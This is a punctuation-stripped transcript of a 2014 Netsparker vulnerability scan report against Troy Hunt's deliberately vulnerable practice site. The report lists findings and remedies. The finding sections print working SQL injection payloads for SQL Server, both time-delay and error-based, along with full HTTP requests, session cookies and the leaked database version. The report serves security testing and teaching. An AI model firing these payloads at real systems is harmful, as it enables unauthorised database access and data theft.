Netsparker Scan Report - ASafaWeb
Transcript of Netsparker Scan Report - ASafaWeb
NETSPARKER SCAN REPORT SUMMARY
TARGET URL httphackyourselffirsttroyhuntcom
SCAN DATE 26082014 85741 AM
REPORT DATE 28082014 94814 PM
SCAN DURATION 004112
TotalRequests10019
AverageSpeed
405reqsec
41identified
22confirmed
10critical
11informational
SCAN SETTINGSENABLEDENGINES
SQL Injection SQL Injection (Boolean) SQLInjection (Blind) Cross-site ScriptingCommand Injection Command Injection (Blind)Local File Inclusion Remote File InclusionRemote Code Evaluation HTTP Header InjectionOpen Redirection Expression LanguageInjection Web App Fingerprint RoR CodeExecution WebDAV
Authentication
Scheduled
VULNERABILITIESCRITICAL
24IMPORTANT12
MEDIUM10
LOW
27INFORMATION
27
1 57
VULNERABILITY SUMMARYURL Parameter Method Vulnerability Confirmed
VersionDisclosure(ASPNET)
No
ASPNETIdentified
No
VersionDisclosure(IIS)
No
Cross-siteScriptingProtectionDisabled
No
AccountLogin CookieNotMarkedasSecure
Yes
CriticalFormServedoverHTTP
Yes
CookieNotMarkedasHttpOnly
Yes
[Possible]Cross-siteRequestForgeryinLoginFormDetected
No
AutocompleteEnabled(PasswordField)
Yes
AccountRegister PasswordTransmittedoverHTTP
Yes
AccountUserProfile [Possible]Cross-siteRequestForgeryDetected
No
[Possible]InternalPathDisclosure(nix)
No
apiadmin nsextt GET [Possible]Cross-siteScripting
No
QueryBased QueryString [Possible]Cross-siteScripting
No
apiadminusers E-mailAddressDisclosure
No
apivote comments POST BlindSQLInjection
Yes
comments POST SQLInjection
Yes
comments POST [Possible]Cross-siteScripting
No
2 57
bundles StackTraceDisclosure(ASPNET)
No
Images OPTIONSMethodEnabled
Yes
ImagesMakes ForbiddenResource
Yes
Make InternalServerError
Yes
Make1 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
Out-of-dateVersion(MicrosoftSQLServer)
No
DatabaseErrorMessageDisclosure
No
orderby GET [Possible]SQLInjection
No
DatabaseDetected(MicrosoftSQLServer)
Yes
Make2 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
orderby GET [Possible]SQLInjection
No
Make3 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
orderby GET [Possible]SQLInjection
No
robotstxt RobotstxtDetected
Yes
Search searchTerm GET Cross-siteScripting
Yes
Supercar3 PermanentCross-siteScripting
Yes
[Possible]InternalPathDisclosure(nix)
No
[Possible]InternalPathDisclosure(Windows)
No
SupercarLeaderboard orderBy GET BlindSQLInjection
Yes
orderBy GET SQLInjection
Yes
3 57
4 57
5 TOTALCRITICAL
CONFIRMED
5
1 Blind SQL InjectionNetsparkeridentifiedablindSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabaseInthesetestsSQLinjectionwasnotobviousbutthedifferentresponsesfromthepagebasedontheinjectiontestallowedustoidentifyandconfirmtheSQLinjection
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocatethealldynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM change alllegacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
11 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
5 57
RequestGET Make1orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230021 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtNissans - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
12 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527-
ParametersParameter Type Value
orderBy GET 1 WAITFOR DELAY 0025--
asc GET false
RequestGET SupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527--ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
6 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
